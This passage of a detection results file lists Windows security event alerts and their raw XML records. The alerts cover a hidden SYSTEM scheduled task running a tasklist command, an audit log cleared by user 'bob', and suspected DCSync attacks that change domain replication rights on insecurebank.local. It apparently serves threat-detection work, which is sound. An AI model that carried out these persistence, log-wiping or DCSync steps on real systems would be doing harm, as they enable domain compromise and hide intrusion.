38609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
</TimeCreated>
<EventRecordID>566836</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""452"" ThreadID=""2836"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x17e2d2</Data>
<Data Name=""TaskName"">\CYAlyNSS</Data>
<Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2015-07-15T20:35:13.2757294&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;LocalSystem&quot;&gt;
&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;
&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;
&lt;LogonType&gt;InteractiveToken&lt;/LogonType&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;P3D&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;LocalSystem&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;cmd.exe&lt;/Command&gt;
&lt;Arguments&gt;/C tasklist &amp;gt; %windir%\Temp\CYAlyNSS.tmp 2&amp;gt;&amp;amp;1&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T09:09:14.916619Z"">
</TimeCreated>
<EventRecordID>198238040</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""744"" ThreadID=""2028"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-1108</SubjectUserSid>
<SubjectUserName>bob</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x8d7099</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242592</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""896"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">57DCCD4C-7381-4371-8480-D74D47019AD8</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA
;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242591</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">A1AA38AA-447E-46C2-ABA0-D205D4D8F873</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA
;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242590</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3300"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">A1AA38AA-447E-46C2-ABA0-D205D4D8F873</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;C
R;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLC